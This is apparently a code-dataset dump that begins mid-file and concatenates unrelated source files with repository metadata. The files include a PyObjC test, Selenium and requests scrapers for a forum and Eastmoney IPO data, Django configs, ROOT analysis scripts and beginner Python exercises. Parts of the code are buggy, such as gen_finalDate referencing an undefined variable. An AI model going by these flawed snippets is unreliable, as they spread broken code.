# "v@" encodes a block returning void and taking one object argument.
MPSAccelerationStructureCompletionHandler = b"v@"
class TestMPSRayIntersector_MPSPolygonAccelerationStructure(TestCase):
    """Binding checks for the MPSPolygonAccelerationStructure API."""
    def test_enum_types(self):
        # MPSPolygonType must be bridged as a real enum type.
        self.assertIsEnumType(MetalPerformanceShaders.MPSPolygonType)
    def test_constants(self):
        # Values asserted against the Metal Performance Shaders headers.
        self.assertEqual(MetalPerformanceShaders.MPSPolygonTypeTriangle, 0)
        self.assertEqual(MetalPerformanceShaders.MPSPolygonTypeQuadrilateral, 1)
| [
"ronaldoussoren@mac.com"
] | ronaldoussoren@mac.com |
d26f9799eb67232c4f9c0d0617aaa9b2f1ec1988 | 61673ab9a42f7151de7337608c442fa6247f13bb | /__scraping__/gall.dcinside.com/main.py | 490c073a6a1c9d7e5de77e2bc435f07699d416ff | [
"MIT"
] | permissive | furas/python-examples | 22d101670ecd667a29376d7c7d7d86f8ec71f6cf | 95cb53b664f312e0830f010c0c96be94d4a4db90 | refs/heads/master | 2022-08-23T23:55:08.313936 | 2022-08-01T14:48:33 | 2022-08-01T14:48:33 | 45,575,296 | 176 | 91 | MIT | 2021-02-17T23:33:37 | 2015-11-04T23:54:32 | Python | UTF-8 | Python | false | false | 774 | py | #!/usr/bin/env python3
# date: 2020.01.01
# https://stackoverflow.com/questions/59551193/i-want-to-download-images-from-python-what-should-i-do/
from selenium import webdriver
import requests
# Chrome setup kept for reference; Firefox (geckodriver) is used below.
#path = r"C:\Users\qpslt\Desktop\py\chromedriver_win32\chromedriver.exe"
#driver = webdriver.Chrome(path)
driver = webdriver.Firefox()
url = "https://gall.dcinside.com/board/view/?id=baseball_new8&no=10131338&exception_mode=recommend&page=1"
driver.get(url)
# All images inside the post body.
images = driver.find_elements_by_xpath('//div[@class="writing_view_box"]//img')
for i, img in enumerate(images, 1):
    img_url = img.get_attribute('src')
    print(i, img_url)
    # Send the page URL as Referer — the image host appears to require it
    # (see the Stack Overflow link in the header comment).
    r = requests.get(img_url, headers={'Referer': url})
    with open("c:/test/{}.jpg".format(i), 'wb') as f:
        f.write(r.content)
| [
"furas@tlen.pl"
] | furas@tlen.pl |
0c44c18c0c305096c4cde6e736d92a55731f5691 | 7048901d6ad4cd58150deec2f7095c4bc20e28bc | /coupons/serializers.py | 8c0a733f4fda39147966e3d16888dab2aad72790 | [] | no_license | reloadercf/Tienda_Backend | f658bc3b01cf7e8d7d86c4964a7808f04f866e66 | ef602107861096c3f2bb8f31eab12db44be4186d | refs/heads/master | 2022-07-29T03:49:40.413308 | 2019-10-21T16:47:40 | 2019-10-21T16:47:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | from rest_framework import serializers
from .models import Coupon
class CouponSerializer(serializers.ModelSerializer):
class Meta:
model = Coupon
fields = '__all__' | [
"contacto@fixter.org"
] | contacto@fixter.org |
266d40130e6ece916b7a7b8d7242e4cccea1a212 | 868c604cdc34e04bba44834e8544036437a7eb9b | /chapter_1_building_abstractions_with_functions/example_1.py | f7311525c376f664a8d9930ffd5961f8ab97a62a | [] | no_license | cshintov/sicp | bc0c1ae5c3f2b9a068e446030fcde59d73209b7c | 46b36254d05171704ddcf45666d006e734a7a196 | refs/heads/master | 2021-04-23T03:14:32.416422 | 2020-03-24T13:24:12 | 2020-03-24T13:24:12 | 249,893,193 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | from urllib import urlopen
# Python 2 example (print statement, urllib.urlopen): fetch a Shakespeare
# text file over HTTP.
shakespeare_poem = 'http://inst.eecs.berkeley.edu/~cs61a/fa11/shakespeare.txt'
poem = urlopen(shakespeare_poem)
# Prints the response object itself, not the text; poem.read() would give content.
print poem
| [
"cshintov@gmail.com"
] | cshintov@gmail.com |
c5f90bbaa9e2eaf84c3dc0035e740cbcbf93576d | d286518da2d7b74d63162cac3befe838f74ac93a | /backend/winter_firefly_27005/urls.py | 7305cf2e7f3fdf9cae158bb72166dce189017d05 | [] | no_license | crowdbotics-apps/winter-firefly-27005 | 7a1b28ec1e1bfa57800c0db25256929925935f1a | 96777599d723241987fd750bcaa72fe040deb738 | refs/heads/master | 2023-04-20T15:57:28.132529 | 2021-05-20T21:00:22 | 2021-05-20T21:00:22 | 369,336,748 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,247 | py | """winter_firefly_27005 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include, re_path
from django.views.generic.base import TemplateView
from allauth.account.views import confirm_email
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
# Primary URL routes: app pages, auth, API and the Django admin.
urlpatterns = [
    path("", include("home.urls")),
    path("accounts/", include("allauth.urls")),
    path("modules/", include("modules.urls")),
    path("api/v1/", include("home.api.v1.urls")),
    path("admin/", admin.site.urls),
    path("users/", include("users.urls", namespace="users")),
    path("rest-auth/", include("rest_auth.urls")),
    # Override email confirm to use allauth's HTML view instead of rest_auth's API view
    path("rest-auth/registration/account-confirm-email/<str:key>/", confirm_email),
    path("rest-auth/registration/", include("rest_auth.registration.urls")),
]
# Branding for the Django admin site.
admin.site.site_header = "Winter Firefly"
admin.site.site_title = "Winter Firefly Admin Portal"
admin.site.index_title = "Winter Firefly Admin"
# swagger: drf-yasg schema view, restricted to authenticated users.
api_info = openapi.Info(
    title="Winter Firefly API",
    default_version="v1",
    description="API documentation for Winter Firefly App",
)
schema_view = get_schema_view(
    api_info,
    public=True,
    permission_classes=(permissions.IsAuthenticated,),
)
urlpatterns += [
    path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
# Root and catch-all fall through to the frontend index.html; these must stay last.
urlpatterns += [path("", TemplateView.as_view(template_name='index.html'))]
urlpatterns += [re_path(r"^(?:.*)/?$",
                TemplateView.as_view(template_name='index.html'))]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
6cdd9ef513534aeb4a9400bcad53eefa19477095 | 6d97e875fb6a3dea9780d918efe33dfd59ac137d | /scripts/calc_rec_probs.py | 2bc4c7f5437257ad4b4b9c2891975142f86a63be | [] | no_license | acarvalh/tth-htt | 0a1350efcf76f425057c809f74d92ae3d719d008 | c6bb3f2bfb6620c858d29c800be1ae1e2246904a | refs/heads/master | 2021-06-20T05:29:35.657498 | 2018-06-02T01:34:37 | 2018-06-02T01:34:37 | 104,874,635 | 0 | 0 | null | 2017-09-26T11:10:10 | 2017-09-26T11:10:10 | null | UTF-8 | Python | false | false | 2,950 | py | from ROOT import TFile
import ROOT
# Category labels used to address the OS/<cat>/mass_ll and SS/<cat>/mass_ll
# histogram directories in the input ROOT file.
categories = ["BB_LL", "BB_ML", "BB_MM", "BB_HL", "BB_HM", "BB_HH", "EE_LL", "EE_ML", "EE_MM", "EE_HL", "EE_HM", "EE_HH", "BE_LL", "BE_ML", "EB_ML", "BE_MM", "BE_HL", "EB_HL", "BE_HM", "EB_HM", "BE_HH"]
def calc_rec_probs(infile, processes):
f = TFile(infile)
for p in processes:
print p
for cat in categories:
histo_OS = f.Get("OS/%s/%s" % (cat, "mass_ll"))
histo_SS = f.Get("SS/%s/%s" % (cat, "mass_ll"))
print "SS/%s/%s" % (cat, "mass_ll")
#print cat, "Entries: %d SS, %d OS" % (histo_SS.GetEntries(), histo_OS.GetEntries())
#for bin_pt in range(1, histo_OS.GetNbinsX()+1):
#for bin_eta in range(1, histo_OS.GetNbinsY()+1):
os_count = histo_OS.Integral()
ss_count = histo_SS.Integral()
if ss_count + os_count > 0:
ratio = 100. * ss_count / (ss_count + os_count)
print "Category: %s:\t Ratio = %f" % (cat, ratio)
else: print "Category: %s:\t Ratio = NA" % cat
#print "Integral OS:", histo_OS.Integral(), histo_OS.Integral(1,histo_OS.GetNbinsX()-1)
#print "Integral SS:", histo_SS.Integral(), histo_SS.Integral(1,histo_SS.GetNbinsX()-1)
def calc_probs_21(infile):
f = TFile(infile)
cats = ["BB_LL", "BB_ML", "BB_MM", "BB_HL", "BB_HM", "BB_HH", "EE_LL", "EE_ML", "EE_MM", "EE_HL", "EE_HM", "EE_HH", "BE_LL", "BE_ML", "EB_ML", "BE_MM", "BE_HL", "EB_HL", "BE_HM", "EB_HM", "BE_HH"]
for cat in cats:
histo_OS = f.Get("gen/OS/%s/mass_ll" % cat)
histo_SS = f.Get("gen/SS/%s/mass_ll" % cat)
os_count = histo_OS.Integral()
ss_count = histo_SS.Integral()
if os_count > 0:ratio = 100. * ss_count / (ss_count + os_count)
else: ratio = 100.
print "Category %s:\t ratio = %f" % (cat, ratio)
def print_probs_21(infile):
f = TFile(infile)
cats = ["BB_LL", "BB_ML", "BB_MM", "BB_HL", "BB_HM", "BB_HH", "EE_LL", "EE_ML", "EE_MM", "EE_HL", "EE_HM", "EE_HH", "BE_LL", "BE_ML", "EB_ML", "BE_MM", "BE_HL", "EB_HL", "BE_HM", "EB_HM", "BE_HH"]
i = 0
os_err = ROOT.Double()
ss_err = ROOT.Double()
for cat in cats:
histo_OS = f.Get("gen/OS/%s/mass_ll" % cat)
histo_SS = f.Get("gen/SS/%s/mass_ll" % cat)
os_count = histo_OS.IntegralAndError(0, histo_OS.GetNbinsX()+2, os_err)
ss_count = histo_SS.IntegralAndError(0, histo_SS.GetNbinsX()+2, ss_err)
if os_count > 0:
ratio = ss_count / (ss_count + os_count)
err = (ss_count + ss_err) / (ss_count + ss_err + os_count - os_err) - ratio
else: ratio = 1.
print "%d, %f, %f, %f" % (i, ratio, err, err)
#print "ERR: ", ss_count, ss_err, os_count, os_err
i+=1
if __name__ == "__main__":
    procs = ["DY"]
    # Harvested stage-2 charge-flip histogram file used as input.
    infile = "/hdfs/local/ttH_2tau/andres/ttHAnalysis/2016/histosCF_summer2/histograms/charge_flip/histograms_harvested_stage2_charge_flip_Tight.root"
    #calc_rec_probs(infile, procs)
    print "_" * 80
    calc_probs_21(infile)
    print_probs_21(infile)
| [
"andres.tiko@cern.ch"
] | andres.tiko@cern.ch |
1ceef34be4f65f2c9baae4ffe8778cb490a17660 | 0a973640f0b02d7f3cf9211fcce33221c3a50c88 | /.history/src/easy-money_20210129091734.py | 095946f3367c54f7ca3a4f7faf804a6b08068a18 | [] | no_license | JiajunChen123/IPO_under_review_crawler | 5468b9079950fdd11c5e3ce45af2c75ccb30323c | 031aac915ebe350ec816c05a29b5827fde588567 | refs/heads/main | 2023-02-26T08:23:09.622725 | 2021-02-04T10:11:16 | 2021-02-04T10:11:16 | 332,619,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,076 | py | # 东方财富网 首发申报
from datetime import datetime,timedelta
from urllib.parse import urlencode
import pandas as pd
import requests
import re
import time
from bs4 import BeautifulSoup
# Base URL shared by every Eastmoney data-center query below.
base_url = 'https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx?'
# Browser-like User-Agent sent with every request.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'}
def date_gen():
    """Yield the list of dates scraped from the Eastmoney 申报企业 page.

    NOTE(review): this is a generator that yields the *complete* list exactly
    once, so callers must unwrap it (e.g. ``next(date_gen())``); a plain
    ``return`` may have been intended — confirm against the call sites.
    """
    r = requests.get('http://data.eastmoney.com/xg/xg/sbqy.html',headers=headers)
    r.encoding = 'gbk'   # decode the page as GBK
    soup = BeautifulSoup(r.text,'html.parser')
    # Every <option> element carries one selectable value — presumably the
    # dates later used as the 'fd' query field downstream.
    dateList = [i.text for i in soup.findAll('option')]
    yield dateList
def get_eastmoneyData(dateList):
    """Download the Eastmoney 首发申报 (IPO filing) table for every date in
    *dateList*, write the combined rows to CSV and return the DataFrame.

    Rows from the 创业板 board are dropped before saving.
    """
    query = {'type': 'NS',
            'sty' : 'NSFR',
            'st' : '1',
            'sr' : '-1',
            'p' : '1',
            'ps' : '5000',
            'js' : 'var IBhynDx={pages:(pc),data:[(x)]}',
            'mkt' : '1',
            'rt' : '53721774'
            }
    main_data = []
    for date in dateList:
        # BUG FIX: the original assigned the whole dateList here on every
        # iteration, so each request carried the same malformed 'fd' value;
        # the loop date is what should be requested.
        query['fd'] = date
        url = base_url + urlencode(query)
        rs = requests.get(url,headers=headers)
        if rs.text == '':
            continue
        js = rs.text.split('var IBhynDx={pages:1,data:')[1]
        # NOTE(review): eval() of a remote payload — acceptable only because
        # the source is trusted; consider ast.literal_eval hardening.
        data = eval(js[:-1])
        main_data.extend(data)
        time.sleep(2)   # be polite to the endpoint
    temp = [i.split(',') for i in main_data]
    columns = ['会计师事务所','保荐代表人','保荐机构','xxx','律师事务所','日期','所属行业','板块','是否提交财务自查报告',
    '注册地','类型','机构名称','签字会计师','签字律师','时间戳','简称']
    df = pd.DataFrame(temp,columns=columns)
    df['文件链接'] = df['时间戳'].apply(lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf")
    # NOTE(review): '保荐机构' appears twice in this selection, duplicating a
    # column in the output; kept to preserve the original layout — confirm.
    df = df[['机构名称', '类型', '板块', '注册地', '保荐机构','保荐代表人', '律师事务所', '签字律师','会计师事务所',
       '签字会计师', '是否提交财务自查报告', '所属行业','日期','xxx', '时间戳', '保荐机构','文件链接']]
    df = df[df['板块'] != '创业板']
    df.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_raw_data.csv',index=False,encoding='utf-8-sig')
    return df
def get_meetingData():
    """Download the IPO 上会 (review-meeting) table for the main board ('2')
    and the SME board ('4'), save it to CSV and return the DataFrame."""
    meetingInfo = []
    for marketType in ['2','4']: # 2 为主板, 4 为中小板
        query = {'type': 'NS',
                'sty' : 'NSSH',
                'st' : '1',
                'sr' : '-1',
                'p' : '1',
                'ps' : '5000',
                'js' : 'var IBhynDx={pages:(pc),data:[(x)]}',
                'mkt' : marketType,
                'rt' : '53723990'
                }
        url = base_url + urlencode(query)
        rss = requests.get(url,headers=headers)
        jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
        # NOTE(review): eval() of a remote payload — trusted source assumed.
        data = eval(jss[:-1])
        meetingInfo.extend(data)
    temp = [j.split(',') for j in meetingInfo]
    columns = ['时间戳','yyy','公司代码','机构名称','详情链接','申报日期','上会日期','申购日期','上市日期','9','拟发行数量','发行前总股本','发行后总股本','13','占发行后总股本比例','当前状态','上市地点','主承销商','承销方式','发审委委员','网站','简称']
    df = pd.DataFrame(temp,columns=columns)
    df['文件链接'] = df['时间戳'].apply(lambda x: "https://notice.eastmoney.com/pdffile/web/H2_" + x + "_1.pdf")
    df['详情链接'] = df['公司代码'].apply(lambda x: "data.eastmoney.com/xg/gh/detail/" + x + ".html")
    df = df[['机构名称', '当前状态', '上市地点', '拟发行数量', '申报日期','上会日期', '申购日期', '上市日期', '主承销商','承销方式', '9', '发行前总股本','发行后总股本','13','占发行后总股本比例','发审委委员','网站','公司代码','yyy','时间戳', '简称', '详情链接','文件链接']]
    # BUG FIX: the original appended `.format(i)` to this literal path; `i`
    # is undefined at this point (NameError in Python 3) and the string has
    # no placeholders, so the call is dropped.
    df.to_csv('C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_data_meeting.csv',index=False,encoding='utf-8-sig')
    return df
def get_zzscData(dateList):
    """Collect 终止审查 (review-terminated) companies for every date in
    *dateList*; saves and returns a two-column DataFrame
    (机构名称, 决定终止审查时间)."""
    zzsc_dict = {}
    for date in dateList:
        query = {'type': 'NS',
                'sty' : 'NSSE',
                'st' : '1',
                'sr' : '-1',
                'p' : '1',
                'ps' : '500',
                'js' : 'var IBhynDx={pages:(pc),data:[(x)]}',
                'mkt' : '4',
                'stat':'zzsc',
                'fd' : date,
                'rt' : '53727636'
                }
        url = base_url + urlencode(query)
        rss = requests.get(url,headers=headers)
        # Marker the endpoint returns when a date has no data at all.
        if rss.text == 'var IBhynDx={pages:0,data:[{stats:false}]}':
            continue
        jss = rss.text.split('var IBhynDx={pages:1,data:')[1]
        # NOTE(review): eval() of a remote payload — trusted source assumed.
        data = eval(jss[:-1])
        for i in data:
            name = i.split(',')[1]
            # Keep only the first-seen termination date per company name.
            if name not in zzsc_dict:
                zzsc_dict[name] = i.split(',')[2]
            else:
                continue
        time.sleep(2)   # be polite to the endpoint
    zzsc = pd.DataFrame(zzsc_dict.items(),columns = ['机构名称','决定终止审查时间'])
    zzsc.to_csv('C:/Users/chen/Desktop/IPO_info/eastmoney_zzsc.csv',encoding='utf-8-sig',index=False)
    return zzsc
def eastmoney_cleanUP(in_path='C:/Users/chen/Desktop/IPO_info/EastMoney/easymoney_raw_data.csv',
                      out_path='C:/Users/chen/Desktop/IPO_info/EastMoney/eastmoney_data_cleaned.csv'):
    """Normalise the raw Eastmoney table and save/return the cleaned frame.

    Cleaning steps: blank or '不适用' audit-report flags become '是', company
    names lose '*' and the '股份有限公司' suffix, 创业板 rows are dropped,
    and (机构名称, 类型) duplicates are reduced to their first row.

    The I/O paths are now parameters defaulting to the original hard-coded
    locations, so the step stays backward-compatible but is reusable/testable.
    NOTE(review): the default input name ('easymoney_raw_data.csv') differs
    from the 'eastmoney_raw_data.csv' written by get_eastmoneyData — confirm.
    """
    east_money = pd.read_csv(in_path)
    # BUG FIX: DataFrame.replace is not in-place; the original discarded the
    # result of both calls, leaving the flag column untouched.
    east_money = east_money.replace({'是否提交财务自查报告':' '},'是')
    east_money = east_money.replace({'是否提交财务自查报告':'不适用'},'是')
    east_money['机构名称'] = east_money['机构名称'].replace(r'\*','',regex=True)
    east_money['机构名称'] = east_money['机构名称'].replace(r'股份有限公司','',regex=True)
    east_money = east_money[east_money['板块'] != '创业板']
    east_money.drop_duplicates(subset =['机构名称','类型'], keep = 'first', inplace = True)
    east_money.to_csv(out_path,encoding='utf-8-sig',index=False)
    return east_money
def gen_finalDate(eastmoney):
ekk = east_money.values.tolist()
abc = {}
for i in ekk:
if i[0] not in abc:
abc[i[0]] = {'机构名称':i[0],
'预先披露':'',
'已反馈':'',
'预先披露更新日期':'',
'其他':'',
'通过发审会日期':'',
'终止审查日期':'',
'保荐机构':i[4],
'律师事务所':i[6],
'会计师事务所':i[8],
'板块':i[2],
'简称':i[15]
}
if i[1] == '已受理':
abc[i[0]]['预先披露'] = i[12]
elif i[1] == '已反馈':
abc[i[0]]['已反馈'] = i[12]
elif i[1] == '预先披露更新':
abc[i[0]]['预先披露更新日期'] = i[12]
elif i[1] == '已通过发审会':
abc[i[0]]['通过发审会日期'] = i[12]
else:
if i[1] == '已受理':
abc[i[0]]['预先披露'] = i[12]
elif i[1] == '已反馈':
abc[i[0]]['已反馈'] = i[12]
elif i[1] == '预先披露更新':
abc[i[0]]['预先披露更新日期'] = i[12]
elif i[1] == '已通过发审会':
abc[i[0]]['通过发审会日期'] = i[12]
elif i[1] in ['已提交发审会讨论,暂缓表决','已上发审会,暂缓表决','中止审查']:
abc[i[0]]['其他'] = {i[1]:i[12]} | [
"chenjiajun.jason@outlook.com"
] | chenjiajun.jason@outlook.com |
65c9f4d94735b5d8ec3bd25b297f2d107ba78d57 | c83e356d265a1d294733885c373d0a4c258c2d5e | /mayan/apps/documents/models/trashed_document_models.py | b01b915df45c786b9f2bae689388dabfd9ca7183 | [
"Apache-2.0"
] | permissive | TrellixVulnTeam/fall-2021-hw2-451-unavailable-for-legal-reasons_6YX3 | 4160809d2c96707a196b8c94ea9e4df1a119d96a | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | refs/heads/master | 2023-08-21T23:36:41.230179 | 2021-10-02T03:51:12 | 2021-10-02T03:51:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 713 | py | from mayan.apps.events.classes import EventManagerMethodAfter
from mayan.apps.events.decorators import method_event
from ..events import event_trashed_document_restored
from ..managers import TrashCanManager
from .document_models import Document
__all__ = ('TrashedDocument',)
class TrashedDocument(Document):
objects = TrashCanManager()
class Meta:
proxy = True
@method_event(
event_manager_class=EventManagerMethodAfter,
event=event_trashed_document_restored,
target='self',
)
def restore(self):
self.in_trash = False
# Skip the edite event at .save().
self._event_ignore = True
self.save()
| [
"79801878+Meng87@users.noreply.github.com"
] | 79801878+Meng87@users.noreply.github.com |
f320319b03d47c6fb1820eed7a74123132d8126f | b059c2cf1e19932abb179ca3de74ced2759f6754 | /S20/day03/02作业.py | 56e199fe792866eaf71cd248d1ce258e423277ee | [] | no_license | Lwk1071373366/zdh | a16e9cad478a64c36227419d324454dfb9c43fd9 | d41032b0edd7d96e147573a26d0e70f3d209dd84 | refs/heads/master | 2020-06-18T02:11:22.740239 | 2019-07-10T08:55:14 | 2019-07-10T08:55:14 | 196,130,277 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,842 | py | # 有变量name = "aleX leNb" 完成如下操作:
# 1. 移除 name 变量对应的值两边的空格,并输出处理结果
#
# name ='aleX leNB'
# print(name.strip())
# 2. 移除name变量左边的"al"并输出处理结果
# name ='aleX leNB'
# print(name[2:])
# 移除name变量右⾯的"Nb",并输出处理结果
# name='aleX leNB'
# print(name[0:7])
# 移除name变量开头的a"与最后的"b",并输出处理结果
# name='aleX leNB'
# # print(name[1:8])
# 判断 name 变量是否以 "al" 开头,并输出结果
# name = 'aleX leNB'
# # print(name.startswith('al'))
# 判断name变量是否以"Nb"结尾,并输出结果
# name = 'aleX leNB'
# print(name.endswith('NB'))
# 将 name 变量对应的值中的 所有的"l" 替换为 "p",并输出结果
# name = 'aleX leNB'
# print(name.replace('l','p'))
# 将name变量对应的值中的第⼀个"l"替换成"p",并输出结果
# print(name.replace('l','p'))
# 将 name 变量对应的值根据 所有的"l" 分割,并输出结果。
# print(name.split('l'))
# 将name变量对应的值根据第⼀个"l"分割,并输出结果。
# print(name.split('l',1))
# 将 name 变量对应的值变⼤写,并输出结果
# print(name.upper())
# 将 name 变量对应的值变⼩写,并输出结果
# print(name.lower())
# 将name变量对应的值⾸字⺟"a"⼤写,并输出结果
# print(name.capitalize())
# 判断name变量对应的值字⺟"l"出现⼏次,并输出结果
# . 从name变量对应的值中找到"N"对应的索引(如果找不到则报错),并输出结果
# print(name.find('N'))
# print(name.index('N'))
# 从name变量对应的值中找到"X le"对应的索引,并输出结果
# print(name.find('X le'))
# 请输出 name 变量对应的值的第 2 个字符?
# name = 'aleX leNB'
# 请输出 name 变量对应的值中 "e" 所在索引位置(两个e都找)?
# print(name.find('e'))
# 有字符串s = "123a4b5c"
# a.通过对s切⽚形成新的字符串s1,s1 = "123"
# b. 通过对s切⽚形成新的字符串s2,s2 = "a4b"
# c. 通过对s切⽚形成新的字符串s3,s3 = "1345"
# d. 通过对s切⽚形成字符串s4,s4 = "2ab"
# e. 通过对s切⽚形成字符串s5,s5 = "c"
# # f. 通过对s切⽚形成字符串s6,s6 = "ba2"
# s='123a4b5c'
# s1=print(s[0:3])
# s2=print(s[3:6])
# s3=print(s[0:7:2])
# s4=print(s[1:6:2])
# s5=print(s[-1])
# s6=print(s[-3:-8:-2])
#
# 使⽤while和for循环分别打印字符串s="asdfer"中每个元素
# s='asdfer'
#
# for i in s:
# print(i)
#
#
#
# count = 0
# while count < len(s):
# print(s[count])
# count += 1
#
# count =0
# while count<len(s):
# print(s[count])
# count += 1
# 使⽤for循环对s="asdfer"进⾏循环,但是每次打印的内容都是"asdfer"
# s ='asdfer'
# for i in s :
# print(s)
# 使⽤for循环对s="abcdefg"进⾏循环,每次打印的内容是每个字符加上sb, 例如:
# asb, bsb,csb,...gsb
# s ='abcdefg'
# for i in s:
# i = i+"sb"
# print(i)
# 使⽤for循环对s="321"进⾏循环,打印的内容依次是:"倒计时3秒","倒计时2
# 秒","倒计时1秒","出发
# s= '321'
# for i in s:
# if i == '3':
# print('倒计时3S')
# if i == '2':
# print('倒计时2S')
# if i == '1':
# print('倒计时1S')
# else:print('出发')
#
# 计算 1 - 2 + 3 ... + 99 中除了88以外所有数的总和
x= 1
result = 0
while x <= 99:
if x % 2 == 1:
result += x
else :
if x != 88:
result -= x
x += 1
print(result)
x=1
s=0
while x <=99:
if x % 2 ==1 :
s = s + x
else:
if x != 88:
s = s - x
x= x+1
print(s)
# 判断⼀句话是否是回⽂. 回⽂: 正着念和反着念是⼀样的. 例如, 上海 ⾃来⽔来⾃海上
# a ="上海自来水来自海上"
# content = input("请输⼊内容:") ⽤户输⼊:5+9或5+ 9或5 + 9,然后进⾏分
# 割再进⾏计算
#
# sum = 0
# content = input('请输入内容:').strip()
# print(content)
# s = content.split('+')
# print(s)
# for i in s:
# sum += int(i)
# print(sum)
# 计算⽤户输⼊的内容中有⼏个整数(以个位数为单位)。
# 如:content = input("请输⼊内容:") # 如fhdal234slfh98769fjdla
#
# content = input('请输入内容:')
# count = 0
# for i in content:
# if i.isdigit():
# count += 1
# else:continue
# print(count)
# 如:content = input("请输⼊内容:") ⽤户输⼊:5+9+6 +12+ 13,然后进⾏分割
# 再进⾏计算。
# sum = 0
# content = input('请输入:')
# count = content.rsplit('+')
# print(count)
# for i in count:
# sum = sum +int(i)
# print(sum)
#
# content =input('输入数字')
# count = 0
# for i in content:
# if i.isdigit():
# count +=1
# else:continue
# print(count)
#
# 写代码,完成下列需求:(升级题)
# ⽤户可持续输⼊(⽤while循环),⽤户使⽤的情况:
# 输⼊A,则显示⾛⼤路回家,然后在让⽤户进⼀步选择:
# 是选择公交⻋,还是步⾏?
# 选择公交⻋,显示10分钟到家,并退出整个程序。
# 选择步⾏,显示20分钟到家,并退出整个程序。
# 输⼊B,则显示⾛⼩路回家,并退出整个程序。
# 输⼊C,则显示绕道回家,然后在让⽤户进⼀步选择:
# 是选择游戏厅玩会,还是⽹吧?
# 选择游戏厅,则显示 ‘⼀个半⼩时到家,爸爸在家,拿棍等你。’并让其重新输⼊
# A,B,C选项。
# 选择⽹吧,则显示‘两个⼩时到家,妈妈已做好了战⽃准备。’并让其重新输⼊
# A,B,C选项
# 输⼊⼀个字符串,要求判断在这个字符串中⼤写字⺟,⼩写字⺟,数字, 其它字符
# 共出现了多少次,并输出出来
# s =input('请输入:')
# count = 0
# for i in s :
# if i.islower():
# count += 1
# print(count)
# if i.isdigit():
# count += 1
# print(count)
# if i.isupper():
# count += 1
# print(count)
# if i.isalnum():
# count += 1
# print(count)
# 制作趣味模板程序需求:等待⽤户输⼊名字、地点、爱好,根据⽤户的名字和爱好进
# ⾏任意现实 如:敬爱可亲的xxx,最喜欢在xxx地⽅⼲xxx
# f ='敬爱可亲的{},最喜欢在{}的{}'
# name = input('姓名')
# hobby = input('爱好') formatde 应用
# addr =input('地点')
#
# print(f.format(name,hobby,addr))
# a = '敬爱的{},喜欢{}干{}'
# name = input('姓名')
# hobby=input('爱好')
# addr=input('地点')
#
# print(a.format(name,hobby,addr))
# 输⼊⼀个字符串,要求判断在这个字符串中⼤写字⺟,⼩写字⺟,数字, 其它字符
# 共出现了多少次,并输出出来
# upp=0
# low=0
# dig=0
# oth=0
# s = input('内容')
# for i in s :
# if i.upper() :
# upp+=1
# if i.lower():
# low+=1
# if i.isdigit() :
# dig+=1
# else:
# oth+=1
# print('大写{},小写{},数字{},其他{}'.format(upp,low,dig,oth))
#
# counter_upper = 0
# counter_lower = 0
# counter_digit = 0
# counter_other = 0
#
#
#
# s = input("input a string:")
# for x in s:
# if x.isdigit():
# counter_digit += 1
# elif x.isupper():
# counter_upper += 1
# elif x.islower():
# counter_lower += 1
# else:
# counter_other += 1
#
# print("大写:{},小写:{},数字:{},其他{}".format(counter_other,counter_upper,counter_digit,counter_lower))
#
# counter_upper = 0
# counter_lower = 0
# counter_digit = 0
# counter_other = 0
#
# s = input('内容:')
# for i in s:
# if i.upper():
# counter_upper += 1
# elif i.lower():
# counter_lower += 1
# elif i.isdigit():
# counter_digit += 1
# else:
# counter_other += 1
# print('大写{},小写{}, 数字{},其他{}'.format(counter_upper,counter_lower,counter_digit,counter_other))
| [
"1071373366@qq.com"
] | 1071373366@qq.com |
bd5492b6bec1f6e3280cbd6bf2c71e883c29edac | ac5e52a3fc52dde58d208746cddabef2e378119e | /exps-gsn-edf/gsn-edf_ut=3.5_rd=0.5_rw=0.04_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=69/sched.py | 921e6e054d0d3ab3a119fcc51f90853d86f0b4cf | [] | no_license | ricardobtxr/experiment-scripts | 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | 7bcebff7ac2f2822423f211f1162cd017a18babb | refs/heads/master | 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 316 | py | -X FMLP -Q 0 -L 3 103 300
-X FMLP -Q 0 -L 3 89 300
-X FMLP -Q 0 -L 3 81 400
-X FMLP -Q 1 -L 2 77 300
-X FMLP -Q 1 -L 2 64 400
-X FMLP -Q 2 -L 2 59 200
-X FMLP -Q 2 -L 2 54 175
-X FMLP -Q 3 -L 1 42 250
-X FMLP -Q 3 -L 1 39 250
32 150
29 150
28 175
28 125
26 175
24 250
20 300
16 150
13 125
| [
"ricardo.btxr@gmail.com"
] | ricardo.btxr@gmail.com |
